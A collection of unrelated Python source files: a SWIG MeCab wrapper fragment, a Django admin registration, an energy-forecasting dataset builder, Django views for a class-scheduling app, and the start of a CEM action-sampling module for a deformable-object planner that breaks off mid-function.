    __getattr__ = lambda self, name: _swig_getattr(self, Lattice, name)
    __repr__ = _swig_repr
    def clear(self):
        return _MeCab.Lattice_clear(self)
    def is_available(self):
        return _MeCab.Lattice_is_available(self)
    # Node access: BOS/EOS nodes plus nodes ending/beginning at a byte position.
    def bos_node(self):
        return _MeCab.Lattice_bos_node(self)
    def eos_node(self):
        return _MeCab.Lattice_eos_node(self)
    def end_nodes(self, pos):
        return _MeCab.Lattice_end_nodes(self, pos)
    def begin_nodes(self, pos):
        return _MeCab.Lattice_begin_nodes(self, pos)
    def sentence(self):
        return _MeCab.Lattice_sentence(self)
    def size(self):
        return _MeCab.Lattice_size(self)
    # Normalization constant Z and temperature theta for marginal probabilities.
    def set_Z(self, Z):
        return _MeCab.Lattice_set_Z(self, Z)
    def Z(self):
        return _MeCab.Lattice_Z(self)
    def set_theta(self, theta):
        return _MeCab.Lattice_set_theta(self, theta)
    def theta(self):
        return _MeCab.Lattice_theta(self)
    def next(self):
        return _MeCab.Lattice_next(self)
    # Request-type flags (MECAB_ONE_BEST, MECAB_NBEST, ... defined above).
    def request_type(self):
        return _MeCab.Lattice_request_type(self)
    def has_request_type(self, request_type):
        return _MeCab.Lattice_has_request_type(self, request_type)
    def set_request_type(self, request_type):
        return _MeCab.Lattice_set_request_type(self, request_type)
    def add_request_type(self, request_type):
        return _MeCab.Lattice_add_request_type(self, request_type)
    def remove_request_type(self, request_type):
        return _MeCab.Lattice_remove_request_type(self, request_type)
    def newNode(self):
        return _MeCab.Lattice_newNode(self)
    def toString(self, *args):
        return _MeCab.Lattice_toString(self, *args)
    def enumNBestAsString(self, N):
        return _MeCab.Lattice_enumNBestAsString(self, N)
    # Partial-parsing constraints (boundary and feature constraints).
    def has_constraint(self):
        return _MeCab.Lattice_has_constraint(self)
    def boundary_constraint(self, pos):
        return _MeCab.Lattice_boundary_constraint(self, pos)
    def feature_constraint(self, pos):
        return _MeCab.Lattice_feature_constraint(self, pos)
    def set_boundary_constraint(self, pos, boundary_constraint_type):
        return _MeCab.Lattice_set_boundary_constraint(self, pos, boundary_constraint_type)
    def set_feature_constraint(self, begin_pos, end_pos, feature):
        return _MeCab.Lattice_set_feature_constraint(self, begin_pos, end_pos, feature)
    def set_result(self, result):
        return _MeCab.Lattice_set_result(self, result)
    # Last error message, if any.
    def what(self):
        return _MeCab.Lattice_what(self)
    def set_what(self, str):
        return _MeCab.Lattice_set_what(self, str)
    __swig_destroy__ = _MeCab.delete_Lattice
    __del__ = lambda self: None
    def __init__(self):
        this = _MeCab.new_Lattice()
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this
    def set_sentence(self, sentence):
        return _MeCab.Lattice_set_sentence(self, sentence)
Lattice_swigregister = _MeCab.Lattice_swigregister
Lattice_swigregister(Lattice)
class Model(_object):
    """SWIG-generated proxy for the MeCab ``Model`` C++ class.

    A Model owns the loaded dictionaries and acts as a factory for Tagger
    and Lattice instances.  All methods delegate to ``_MeCab``.
    """
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, Model, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, Model, name)
    __repr__ = _swig_repr
    def dictionary_info(self):
        return _MeCab.Model_dictionary_info(self)
    def transition_cost(self, rcAttr, lcAttr):
        return _MeCab.Model_transition_cost(self, rcAttr, lcAttr)
    def lookup(self, begin, end, lattice):
        return _MeCab.Model_lookup(self, begin, end, lattice)
    # Factory methods for the two companion objects.
    def createTagger(self):
        return _MeCab.Model_createTagger(self)
    def createLattice(self):
        return _MeCab.Model_createLattice(self)
    def swap(self, model):
        return _MeCab.Model_swap(self, model)
    # Under new-style classes 'version' is exposed as a staticmethod.
    if _newclass:
        version = staticmethod(_MeCab.Model_version)
    else:
        version = _MeCab.Model_version
    __swig_destroy__ = _MeCab.delete_Model
    __del__ = lambda self: None
    def __init__(self, *args):
        this = _MeCab.new_Model(*args)
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this
Model_swigregister = _MeCab.Model_swigregister
Model_swigregister(Model)
def Model_version():
    """Return the MeCab library version string (delegates to the C module)."""
    return _MeCab.Model_version()
# NOTE: SWIG immediately rebinds the name to the raw C function, shadowing
# the wrapper above; kept exactly as emitted by the generator.
Model_version = _MeCab.Model_version
class Tagger(_object):
    """SWIG-generated proxy for the MeCab ``Tagger`` C++ class.

    The Tagger is the main morphological-analysis entry point: it parses raw
    text into nodes or formatted strings.  All methods delegate to the
    ``_MeCab`` C extension.
    """
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, Tagger, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, Tagger, name)
    __repr__ = _swig_repr
    # Parsing entry points: formatted string, node list, and N-best variants.
    def parse(self, *args):
        return _MeCab.Tagger_parse(self, *args)
    def parseToNode(self, str):
        return _MeCab.Tagger_parseToNode(self, str)
    def parseNBest(self, N, str):
        return _MeCab.Tagger_parseNBest(self, N, str)
    def parseNBestInit(self, str):
        return _MeCab.Tagger_parseNBestInit(self, str)
    def nextNode(self):
        return _MeCab.Tagger_nextNode(self)
    def next(self):
        return _MeCab.Tagger_next(self)
    def formatNode(self, node):
        return _MeCab.Tagger_formatNode(self, node)
    # Analysis configuration accessors.
    def set_request_type(self, request_type):
        return _MeCab.Tagger_set_request_type(self, request_type)
    def request_type(self):
        return _MeCab.Tagger_request_type(self)
    def partial(self):
        return _MeCab.Tagger_partial(self)
    def set_partial(self, partial):
        return _MeCab.Tagger_set_partial(self, partial)
    def lattice_level(self):
        return _MeCab.Tagger_lattice_level(self)
    def set_lattice_level(self, level):
        return _MeCab.Tagger_set_lattice_level(self, level)
    def all_morphs(self):
        return _MeCab.Tagger_all_morphs(self)
    def set_all_morphs(self, all_morphs):
        return _MeCab.Tagger_set_all_morphs(self, all_morphs)
    def set_theta(self, theta):
        return _MeCab.Tagger_set_theta(self, theta)
    def theta(self):
        return _MeCab.Tagger_theta(self)
    def dictionary_info(self):
        return _MeCab.Tagger_dictionary_info(self)
    # Last error message, if any.
    def what(self):
        return _MeCab.Tagger_what(self)
    __swig_destroy__ = _MeCab.delete_Tagger
    __del__ = lambda self: None
    # Under new-style classes 'version' is exposed as a staticmethod.
    if _newclass:
        version = staticmethod(_MeCab.Tagger_version)
    else:
        version = _MeCab.Tagger_version
    def __init__(self, *args):
        this = _MeCab.new_Tagger(*args)
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this
    def parseToString(self, str, length=0):
        return _MeCab.Tagger_parseToString(self, str, length)
Tagger_swigregister = _MeCab.Tagger_swigregister
Tagger_swigregister(Tagger)
def Tagger_version():
    """Return the MeCab library version string (delegates to the C module)."""
    return _MeCab.Tagger_version()
# NOTE: SWIG immediately rebinds the name to the raw C function, shadowing
# the wrapper above; kept exactly as emitted by the generator.
Tagger_version = _MeCab.Tagger_version
VERSION = _MeCab.VERSION
# This file is compatible with both classic and new-style classes.
|
# Expose the UserProfile model in the Django admin site with the default
# ModelAdmin options.
from django.contrib import admin
from profile.models import UserProfile
admin.site.register(UserProfile)
import os
from collections import defaultdict
from Fuzzy_clustering.version2.common_utils.logging import create_logger
from Fuzzy_clustering.version2.dataset_manager.create_dataset_for_load_lv import dataset_creator_LV
from Fuzzy_clustering.version2.dataset_manager.create_dataset_for_load import dataset_creator_load
from Fuzzy_clustering.version2.dataset_manager.create_dataset_for_load_scada import dataset_creator_scada
from Fuzzy_clustering.version2.dataset_manager.create_datasets_dense import DatasetCreatorDense
from Fuzzy_clustering.version2.dataset_manager.create_datasets_point import DatasetCreatorPoint
from Fuzzy_clustering.version2.dataset_manager.create_datasets_for_fa import dataset_creator_ecmwf
from Fuzzy_clustering.version2.dataset_manager.create_datasets_for_fa import dataset_creator_xmachina
from Fuzzy_clustering.version2.dataset_manager.create_datasets_pca import DatasetCreatorPCA
class DatasetCreator:
    """Build the training/evaluation datasets for every project of a group.

    Dispatches to the appropriate dataset creator (PCA, dense or point
    compression) depending on the problem type (pv, wind, load, fa) and on
    the configuration found in ``static_data``.

    :param static_data: group-wide configuration dict (paths, NWP model and
        resolution, data variables, compression method, ...).
    :param group_static_data: list of per-project configurations; each entry
        carries its own 'static_data' dict with the project data path.
    :param test: True -> create the files with suffix ``_test`` used by the
        evaluation procedure; False -> create the files used for training;
        None -> short-term mode (the ``_test`` names are reused and the
        short-term creators are invoked).
    """

    def __init__(self, static_data, group_static_data, test):
        self.test = test
        self.group_static_data = group_static_data
        self.static_data = static_data
        self.file_data = static_data['data_file_name']
        self.project_owner = static_data['project_owner']
        self.projects_group = static_data['projects_group']
        self.area_group = static_data['area_group']
        self.version_group = static_data['version_group']
        self.version_model = static_data['version_model']
        self.weather_in_data = static_data['weather_in_data']
        self.nwp_model = static_data['NWP_model']
        self.nwp_resolution = static_data['NWP_resolution']
        self.data_variables = static_data['data_variables']
        self.model_type = static_data['type']
        self.sys_folder = self.static_data['sys_folder']
        self.path_nwp = self.static_data['path_nwp']
        self.path_group = self.static_data['path_group']
        self.path_nwp_group = self.static_data['path_nwp_group']
        self.logger = create_logger(logger_name=f'DataManager_{self.model_type}', abs_path=self.path_group,
                                    logger_path='log_data_manager.log')
        # if self.test is True creates the files with suffix _test that are used in evaluation procedure
        # else if self.test is False creates the files that are used in training procedure
        # if self.test is None (short-term mode) the *_test names are reused
        if self.test is not None:
            self.dataset_x = 'dataset_X_test.csv' if self.test else 'dataset_X.csv'
            self.dataset_y = 'dataset_y_test.csv' if self.test else 'dataset_y.csv'
            self.dataset_lstm = 'dataset_lstm_test.pickle' if self.test else 'dataset_lstm.pickle'
            self.dataset_cnn = 'dataset_cnn_test.pickle' if self.test else 'dataset_cnn.pickle'
        else:
            self.dataset_x = 'dataset_X_test.csv'
            self.dataset_y = 'dataset_y_test.csv'
            self.dataset_lstm = 'dataset_lstm_test.pickle'
            self.dataset_cnn = 'dataset_cnn_test.pickle'

    @staticmethod
    def _remove_if_exists(path):
        """Delete *path* if it exists; silently ignore missing files."""
        if os.path.exists(path):
            os.remove(path)

    def create_datasets(self, data):
        """
        This function calls the data creators (PCA or dense) of every problem (wind, pv, load etc). Removes old files if
        'recreate_datasets' parameter in static_data is True in order to create new files
        :param data:
            pandas dataframe each column might be a different project for the cases wind and pv or for the cases of
            load and Gas the first column is the project and the following columns are explanatory variables
        :return:
            'Done' if the files are created successfully
        :raises ValueError: if the configured model type is not recognized
        """
        if (self.static_data['recreate_datasets']) or (self.test is None):
            for project in self.group_static_data:
                path_prefix = project['static_data']['path_data']
                # Drop every stale dataset file so it is rebuilt below.
                for file_name in (self.dataset_x, self.dataset_y, self.dataset_cnn, self.dataset_lstm):
                    self._remove_if_exists(os.path.join(path_prefix, file_name))
        # Collect the projects whose dataset files are missing and therefore
        # need to be (re)created.
        project_info = defaultdict(list)
        for project in self.group_static_data:
            path_prefix = project['static_data']['path_data']
            # FIXME: With that implementation you can't have a dataset with PCA and Dense at the same time.
            if not (os.path.exists(os.path.join(path_prefix, self.dataset_x)) or
                    os.path.exists(os.path.join(path_prefix, self.dataset_y))):
                # TODO: Cleanse or filter wrong/missing values
                project_info['projects'].append(project)
                project_info['path_prefixes'].append(path_prefix)
                project_info['project_cols'].append(project['_id'])
        print(project_info)  # debug: which projects will be (re)built
        if len(project_info['projects']) > 0:
            if self.model_type in {'pv', 'wind'}:
                self.load_pv_wind(data, project_info)
            elif self.model_type == 'load':
                self.load_energy(data, project_info)
            elif self.model_type == 'fa':
                self.load_gas(data, project_info)
            else:
                raise ValueError(f"Cannot recognize model type {self.model_type}")
        return 'Done'

    def load_pv_wind(self, data, project_info):
        """Create datasets for pv/wind projects using the configured
        compression method ('PCA', 'dense' or 'point').

        :raises ValueError: if the compression method is not recognized.
        """
        if self.static_data['compress_data'] == 'PCA':
            for project, path_prefix in zip(project_info['projects'], project_info['path_prefixes']):
                if self.static_data['recreate_datasets']:  # FIXME: Why do we delete it only under PCA?
                    # Guarded delete: the pickle does not exist on a fresh run,
                    # and an unconditional os.remove raised FileNotFoundError.
                    self._remove_if_exists(os.path.join(path_prefix, 'nwps_3d.pickle'))
                if project['_id'] != self.projects_group + '_' + self.model_type:
                    # Datasets are processed and created within the functions
                    dataset = DatasetCreatorPCA(project,
                                                data=data[project['_id']].dropna(),
                                                n_jobs=self.static_data['njobs'],
                                                test=self.test)
                    dataset.make_dataset_res()
                    self.logger.info('Dataset using PCA for testing constructed for %s', project['_id'])
                else:  # All projects under a country are executed, PCA can't process that kind of data.
                    dataset = DatasetCreatorDense(self.projects_group,
                                                  project,
                                                  data[project['_id']].dropna(),
                                                  self.path_nwp_group,
                                                  self.nwp_model,
                                                  self.nwp_resolution,
                                                  self.data_variables,
                                                  njobs=self.static_data['njobs'],
                                                  test=self.test)
                    if self.test is not None:
                        dataset.make_dataset_res()
                    else:
                        dataset.make_dataset_res_short_term()
        elif self.static_data['compress_data'] == 'dense':
            self.logger.info(f'Start creating dataset using dense compression for country {self.projects_group}')
            for project in project_info['projects']:
                self.logger.info(f"Start creating dataset using dense compression for projects {project['_id']}")
            if len(project_info['project_cols']) > 0:
                dataset = DatasetCreatorDense(self.projects_group,
                                              project_info['projects'],
                                              data[project_info['project_cols']].dropna(axis=1),
                                              self.path_nwp_group,
                                              self.nwp_model,
                                              self.nwp_resolution,
                                              self.data_variables,
                                              njobs=self.static_data['njobs'],
                                              test=self.test)
                if self.test is not None:
                    dataset.make_dataset_res()
                else:
                    dataset.make_dataset_res_short_term()
            self.logger.info(f'Dataset using dense compression for country {self.projects_group} created')
        elif self.static_data['compress_data'] == 'point':
            # Log messages previously said "dense compression" here (copy-paste).
            self.logger.info(f'Start creating dataset using point compression for country {self.projects_group}')
            for project in project_info['projects']:
                self.logger.info(f"Start creating dataset using point compression for projects {project['_id']}")
            if len(project_info['project_cols']) > 0:
                dataset = DatasetCreatorPoint(self.projects_group,
                                              project_info['projects'],
                                              data[project_info['project_cols']].dropna(),
                                              self.path_nwp_group,
                                              self.nwp_model,
                                              self.nwp_resolution,
                                              self.data_variables,
                                              njobs=self.static_data['njobs'],
                                              test=self.test)
                if self.test is not None:
                    dataset.make_dataset_res()
                else:
                    dataset.make_dataset_res_short_term()
            self.logger.info(f'Dataset using point compression for country {self.projects_group} created')
        else:
            raise ValueError(
                f"Cannot recognize dimensionality reduction method {self.static_data['compress_data']}")

    def load_energy(self, data, project_info):
        """Create datasets for load-forecasting projects (SCADA, LV load or
        gfs/skiron NWP based)."""
        if len(project_info['project_cols']) > 0:
            self.logger.info('Start creating dataset for load')
            if self.nwp_model == 'ecmwf':
                if project_info['project_cols'][0] == 'SCADA':
                    dataset = dataset_creator_scada(self.projects_group, project_info['projects'], data,
                                                    self.path_nwp_group,
                                                    self.nwp_model, self.nwp_resolution, self.data_variables,
                                                    njobs=self.static_data['njobs'], test=self.test)
                    dataset.make_dataset_scada()
                elif project_info['project_cols'][0] == 'lv_load':
                    dataset = dataset_creator_LV(self.projects_group, project_info['projects'], data, self.path_nwp_group,
                                                 self.nwp_model, self.nwp_resolution, self.data_variables,
                                                 njobs=self.static_data['njobs'], test=self.test)
                    dataset.make_dataset_lv()
            elif self.nwp_model in {'gfs', 'skiron'}:
                dataset = dataset_creator_load(self.projects_group, project_info['projects'], data,
                                               self.path_nwp_group,
                                               self.nwp_model, self.nwp_resolution, self.data_variables,
                                               njobs=self.static_data['njobs'], test=self.test)
                if self.test is not None:
                    dataset.make_dataset_load()
                else:
                    dataset.make_dataset_load_short_term()

    def load_gas(self, data, project_info):
        """Create datasets for fa (gas) projects from ecmwf or xmachina data."""
        if len(project_info['project_cols']) > 0:
            self.logger.info('Start creating dataset for fa')
            if self.nwp_model == 'ecmwf':
                dataset = dataset_creator_ecmwf(self.projects_group, project_info['projects'], data,
                                                self.path_nwp_group,
                                                self.nwp_model, self.nwp_resolution,
                                                self.data_variables,
                                                njobs=self.static_data['njobs'], test=self.test)
                dataset.make_dataset_ecmwf()
            elif self.nwp_model == 'xmachina':
                dataset = dataset_creator_xmachina(self.projects_group, project_info['projects'], data,
                                                   self.path_nwp_group,
                                                   self.nwp_model, self.nwp_resolution,
                                                   self.data_variables,
                                                   njobs=self.static_data['njobs'], test=self.test)
                # version_model 0 -> current-day dataset, otherwise day-ahead.
                if self.version_model == 0:
                    dataset.make_dataset_xmachina_curr()
                else:
                    dataset.make_dataset_xmachina_dayahead()
from django.shortcuts import render, redirect, get_object_or_404, get_list_or_404
from django.views import generic
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from .models import Materias, PNF, Profesores, Secciones, Trimestre, Horarios, Salones
from .form import MateriaForm, HorarioForm
import json
def index(request):
    """Landing view: render the calendar for authenticated users; otherwise
    process the login form (POST) or show it (GET)."""
    if request.user.is_authenticated:
        return render(request, 'calendario.html', {})
    else:
        if request.method == 'POST':
            username = request.POST.get('username', None)
            password = request.POST.get('password', None)
            user = authenticate(username=username, password=password)
            if user is not None:
                login(request, user)
                return redirect('home')
            else:
                # Invalid credentials: re-render the login page keeping the
                # username the visitor typed.
                return render(request, 'login.html', {'user': username})
        return render(request, 'login.html', {})
def redireccion(request):
    """Redirect helper: always send the visitor back to 'home'.

    The previous version only handled POST and implicitly returned ``None``
    for any other method, which makes Django raise
    "The view didn't return an HttpResponse object". Redirecting for every
    method is backward-compatible (POST behaviour unchanged) and fixes the
    crash on GET.
    """
    return redirect('home')
def logout_view(request):
    """Terminate the current session and return to the landing page."""
    logout(request)
    return redirect('home')
def confirmado(request):
    """Static confirmation page shown after successful CRUD operations."""
    return render(request, 'confirmado.html')
# ################# Horarios ##################
def HorarioDetail(request, id):
    """Show one schedule (Horario) with its deserialized cell positions.

    ``horario.posicion`` holds a JSON-encoded layout; it is decoded and
    passed to the template.
    """
    horario = get_object_or_404(Horarios, id=id)
    try:
        posicion = json.loads(horario.posicion)
        return (
            render(request, "horario/horarios_detail.html",
                   context={'horarios': horario, 'posicion': posicion},
                   )
        )
    # NOTE(review): DoesNotExist cannot fire after get_object_or_404, and a
    # malformed JSON raises json.JSONDecodeError, which is not caught here —
    # confirm intended error handling.
    except (KeyError, Horarios.DoesNotExist):
        return render(request, 'listasHorarios/secciones_h.html', {
            'question': horario,
            'error_message': "Ese Horario no existe, por favor escoja otro.",
        })
@login_required
def CrearHorario(request, id):
    """Create a schedule for the trimester identified by *id*.

    NOTE(review): after a valid save the view falls through and re-renders
    the form instead of redirecting (post/redirect/get pattern) — confirm
    whether that is intended.
    """
    trimestre = Trimestre.objects.filter(id=id)
    if request.method == "POST":
        form = HorarioForm(request.POST)
        if form.is_valid():
            form.save()
    else:
        form = HorarioForm()
    return render(request, 'horario/horarios_form.html', context={'form': form, 'trimestre': trimestre})
@login_required
def HorarioUpdate(request, id):
    """Edit an existing schedule (Horario).

    On a valid POST the form is saved and the user is redirected to the
    section list.  BUG FIX: the original computed ``redirect(...)`` but never
    returned it, so the response was discarded and the edit page was
    re-rendered after every save.
    """
    horario = get_object_or_404(Horarios, id=id)
    trimestre = Trimestre.objects.filter(codigo__icontains=horario.seccion.trimestre)
    if request.method == "POST":
        form = HorarioForm(request.POST, instance=horario)
        if form.is_valid():
            form.save()
            return redirect("horario/secciones")
    else:
        form = HorarioForm()
    try:
        posicion = json.loads(horario.posicion)
        return (
            render(request, "horario/horario_update.html",
                   context={'horarios': horario, 'posicion': posicion, 'form': form, 'trimestre': trimestre},
                   )
        )
    except (KeyError, Horarios.DoesNotExist):
        return render(request, 'listasHorarios/secciones_h.html', {
            'question': horario,
            'error_message': "Ese Horario no existe, por favor escoja otro.",
        })
class DeleteHorario(LoginRequiredMixin, generic.DeleteView):
    """Confirm and delete a schedule; requires login."""
    model = Horarios
    # NOTE(review): relative success_url — confirm it resolves as intended.
    success_url = "horario/secciones"
@login_required
def Horario_profesor(request, id_profesor):
    """Show the schedule cells belonging to one professor.

    Collects, from every schedule of the professor's sections, the JSON cell
    entries whose text mentions one of the professor's subjects.
    """
    profesor = get_object_or_404(Profesores, id=id_profesor)
    horario = Horarios.objects.filter(seccion__profesores=profesor)
    posicion = []
    try:
        for h in horario:
            posiciones = json.loads(h.posicion)
            for i in posiciones:
                for m in profesor.materias.all():
                    # Keep the cell if the subject name appears in its text.
                    if m.nombre in str(i):
                        posicion.append(i)
        return (
            render(request, "listasHorarios/horario_profesor.html",
                   context={'horarios': horario, 'posicion': posicion, 'profesor': profesor},
                   )
        )
    except (KeyError, Horarios.DoesNotExist):
        return render(request, 'listasHorarios/secciones_h.html', {
            'question': horario,
            'error_message': "Ese Horario no existe, por favor escoja otro.",
        })
@login_required
def Horario_salon(request, salon_id):
    """List the professors attached to a PNF.

    NOTE(review): despite the name, this view fetches a PNF (not a Salones
    object) and filters professors by it — confirm naming/intent.
    """
    salon = get_object_or_404(PNF, id=salon_id)
    try:
        profesor = Profesores.objects.filter(pnf__nombre=salon)
        return (
            render(request, "listasHorarios/salon_h.html",
                   context={'profesor': profesor, 'salon': salon},
                   )
        )
    except (KeyError, Profesores.DoesNotExist):
        return render(request, 'horario/lista.html', {
            'question': salon,
            'error_message': "Ese PNF no existe, por favor escoja otro.",
        })
def listaSeccionHorario(request):
    """List every section, marking those that already have a schedule."""
    secciones = Secciones.objects.all()
    horarios = Horarios.objects.all()
    # Sections already covered by a schedule.
    con_horario = [horario.seccion for horario in horarios]
    return render(
        request, "listasHorarios/secciones_h.html",
        context={'secciones': secciones, 'conHorario': con_horario, 'horarios': horarios},
    )
def listaProfesorHorario(request):
    """List every professor, marking those appearing in some schedule."""
    profesores = Profesores.objects.all()
    horarios = Horarios.objects.all()
    # Professors that teach in at least one scheduled section, first
    # occurrence order, no duplicates.
    vistos = []
    for prof in (p for h in horarios for p in h.seccion.profesores.all()):
        if prof not in vistos:
            vistos.append(prof)
    return render(
        request, "listasHorarios/profesores_h.html",
        context={'secciones': profesores, 'conHorario': vistos, 'horarios': horarios},
    )
# ################# Materias ##################
@login_required
def crearMateria(request):
    """Create a subject (Materia) from the generic form.

    NOTE(review): after a valid save the form page is re-rendered instead of
    redirecting — confirm whether that is intended.
    """
    if request.method == "POST":
        form = MateriaForm(request.POST)
        if form.is_valid():
            form.save()
    else:
        form = MateriaForm()
    return render(request, 'horario/generic_form.html', {'form': form})
class ListMaterias(generic.ListView):
    """List all subjects (Materias)."""
    model = Materias
class UpdateMaterias(LoginRequiredMixin, generic.UpdateView):
    """Edit a subject; requires login."""
    model = Materias
    fields = ['nombre', 'codigo', 'unidadesC']
    template_name = 'horario/generic_form.html'
    success_url = '/confirmado'
class DeleteMaterias(generic.DeleteView):
    """Confirm and delete a subject."""
    model = Materias
    # NOTE(review): 'fields' has no effect on a DeleteView.
    fields = ['nombre', 'codigo', 'unidadesC']
    template_name = 'horario/delete_form.html'
    success_url = '/confirmado'
# ################# PNF ##################
class ListPNF(generic.ListView):
    """List all PNF programs."""
    model = PNF
class CrearPNF(generic.CreateView):
    """Create a PNF program."""
    model = PNF
    # NOTE(review): 'trimetres' matches the model field spelling — keep in sync.
    fields = ['nombre', 'trimetres']
    template_name = 'horario/generic_form.html'
class UpdatePNF(generic.UpdateView):
    """Edit a PNF program."""
    model = PNF
    fields = ['nombre', 'trimetres']
    template_name = 'horario/generic_form.html'
    success_url = '/confirmado'
class DeletePNF(generic.DeleteView):
    """Confirm and delete a PNF program."""
    model = PNF
    # NOTE(review): 'fields' has no effect on a DeleteView.
    fields = ['nombre', 'trimetres']
    template_name = 'horario/delete_form.html'
    success_url = '/confirmado'
# ################# Profesores ##################
class CrearProfesor(generic.CreateView):
    """Create a professor."""
    model = Profesores
    fields = ['nombre', 'pnf']
    template_name = 'horario/generic_form.html'
class UpdateProfesor(generic.UpdateView):
    """Edit a professor."""
    model = Profesores
    fields = ['nombre', 'pnf']
    template_name = 'horario/generic_form.html'
    success_url = '/confirmado'
class DeleteProfesor(generic.DeleteView):
    """Confirm and delete a professor."""
    model = Profesores
    # NOTE(review): 'fields' has no effect on a DeleteView.
    fields = ['nombre', 'pnf']
    template_name = 'horario/delete_form.html'
    success_url = '/confirmado'
class ListProfesor(generic.ListView):
    """List all professors."""
    model = Profesores
    template_name = 'horario/lista.html'
def Profesor_Pnf(request, pnf_nombre):
    """List the professors belonging to the PNF named *pnf_nombre*."""
    pnf = get_object_or_404(PNF, nombre=pnf_nombre)
    try:
        profesor = Profesores.objects.filter(pnf__nombre=pnf)
        return (
            render(request, "profe-pnf.html",
                   context={'profesor': profesor, 'pnf': pnf},
                   )
        )
    # NOTE(review): filter() never raises DoesNotExist, so this branch is
    # effectively unreachable — confirm intended error handling.
    except (KeyError, Profesores.DoesNotExist):
        return render(request, 'horario/lista.html', {
            'question': pnf,
            'error_message': "Ese PNF no existe, por favor escoja otro.",
        })
# ################# Trimestres ##################
class ListTrimestre(generic.ListView):
    """List all trimesters."""
    model = Trimestre
    template_name = 'horario/listaTrimestre.html'
class CrearTrimestre(generic.CreateView):
    """Create a trimester."""
    model = Trimestre
    fields = '__all__'
    template_name = 'horario/generic_form.html'
class TrimestreDetail(generic.DetailView):
    """Show one trimester."""
    model = Trimestre
class TrimestreUpdate(generic.UpdateView):
    """Edit a trimester."""
    model = Trimestre
    fields = '__all__'
    template_name = 'horario/generic_form.html'
    success_url = '/confirmado'
class TrimestreDelete(generic.DeleteView):
    """Confirm and delete a trimester."""
    model = Trimestre
    template_name = 'horario/delete_form.html'
    success_url = '/confirmado'
# ################# Secciones ##################
class SeccionDetail(generic.DetailView):
    """Show one section."""
    model = Secciones
class ListaSecciones(generic.ListView):
    """List all sections."""
    model = Secciones
class CrearSecciones(generic.CreateView):
    """Create a section."""
    model = Secciones
    fields = ['codigo', 'pnf', 'trimestre', 'modalidad', 'profesores']
    template_name = 'horario/generic_form.html'
    success_url = 'secciones'
class UpdateSecciones(generic.UpdateView):
    """Edit a section."""
    model = Secciones
    fields = ['codigo', 'pnf', 'trimestre', 'modalidad', 'profesores']
    template_name = 'horario/generic_form.html'
    success_url = '/confirmado'
class DeleteSecciones(generic.DeleteView):
    """Confirm and delete a section."""
    model = Secciones
    template_name = 'horario/delete_form.html'
    success_url = '/confirmado'
|
import numpy as np
from numpy.linalg import det
from numpy import sqrt
from deform.model.dl_model import *
from deform.model.create_dataset import *
from deform.model.hidden_dynamics import get_next_state_linear
import math
import torch
from torch.utils.data import Dataset, DataLoader
from torchvision.utils import save_image
from torch.distributions import Uniform
from torch.distributions.multivariate_normal import MultivariateNormal
from torch.distributions.kl import kl_divergence
import torchvision.transforms.functional as TF
from PIL import Image
from deform.utils.utils import plot_cem_sample
import os
def sample_action(I, mean=None, cov=None):
    """Sample one 4-component action ``(x, y, angle, length)`` for the CEM planner.

    Actions are drawn uniformly when no distribution has been fitted yet
    (``mean``/``cov`` are both None, i.e. the first CEM iteration) or from
    the fitted multivariate Gaussian otherwise.  Sampling is repeated until
    the (x, y) pick lands on an active pixel of the binary image ``I``
    (assumed shape (1, 1, 50, 50) — see the callers in this file).

    Changes vs. original: removed the unused local ``thres``; added docs.

    :param I: binary input image batch.
    :param mean: mean of the fitted Gaussian, or None.
    :param cov: covariance of the fitted Gaussian, or None.
    :return: a 1-D float tensor of 4 action components.
    """
    action = torch.tensor([0]*4, dtype=torch.float)
    # Scale uniform [0, 1) samples to pixel coordinates (0..50), an angle in
    # [0, 2*pi) and an action length in [0.01, 0.15).
    multiplier = torch.tensor([50, 50, 2*math.pi, 0.14])
    addition = torch.tensor([0, 0, 0, 0.01])
    if I[0][0][0][0] == 1.:
        # Special case: top-left pixel active — return one sample directly.
        if ((mean is None) and (cov is None)):
            action_base = Uniform(low=0.0, high=1.0).sample((4,))
            action = torch.mul(action_base, multiplier) + addition
        else:
            cov = add_eye(cov)
            action = MultivariateNormal(mean, cov).sample()
            action[0], action[1] = 0, 0
        return action
    # Rejection-sample until (x, y) hits an active pixel.
    # NOTE(review): loops forever if the image has no active pixel — confirm
    # callers guarantee a non-empty mask.
    while I[0][0][torch.floor(action[0]).type(torch.LongTensor)][torch.floor(action[1]).type(torch.LongTensor)] != 1.:
        if ((mean is None) and (cov is None)):
            action_base = Uniform(low=0.0, high=1.0).sample((4,))
            action = torch.mul(action_base, multiplier) + addition
        else:
            cov = add_eye(cov)
            action = MultivariateNormal(mean, cov).sample()
            # Re-draw until the pixel coordinates are inside the 50x50 image.
            while torch.floor(action[0]).type(torch.LongTensor) >= 50 or torch.floor(action[1]).type(torch.LongTensor) >= 50:
                cov = add_eye(cov)
                action = MultivariateNormal(mean, cov).sample()
    return action
def generate_next_pred_state(recon_model, dyn_model, img_pre, act_pre):
    """Predict the next image from an (image, action) pair.

    The reconstruction model encodes image and action into latent space, the
    dynamics model yields the linear transition matrices (K, L), the latent
    state is propagated one step, and the decoder maps it back to an image.

    :param recon_model: reconstruction (encoder/decoder) model.
    :param dyn_model: latent dynamics model.
    :param img_pre: current image.
    :param act_pre: current action (4 components).
    :return: decoded prediction of the next image.
    """
    img_batch = img_pre.reshape((-1, 1, 50, 50))
    act_batch = act_pre.reshape((-1, 4)).type(torch.float)
    latent_img, latent_act, _, _, _ = recon_model(img_batch, act_batch, None)
    K_T, L_T = dyn_model(img_batch, act_batch)
    latent_next = get_next_state_linear(latent_img, latent_act, K_T, L_T)
    return recon_model.decoder(latent_next)
def generate_next_pred_state_in_n_step(recon_model, dyn_model, img_initial, N, H, mean=None, cov=None):
    """Roll out N sampled action sequences of horizon H from one image.

    :return: (imgs, actions) where ``imgs`` holds the final predicted image
        of each rollout and ``actions`` the *first* action of each sequence.
    """
    imgs = [None]*N
    actions = torch.tensor([[0.]*4]*N)
    for seq_idx in range(N):
        current = img_initial
        for step in range(H):
